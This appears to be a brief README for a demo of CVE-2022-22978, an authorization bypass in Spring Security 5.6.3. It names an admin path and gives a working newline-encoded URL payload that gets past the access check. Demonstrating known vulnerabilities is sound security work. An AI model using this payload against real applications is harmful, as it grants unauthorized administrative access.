CVE-2022-22978 Demo via Spring security 5.6.3
Admin page: /admin/
Payload: /admin/index%0a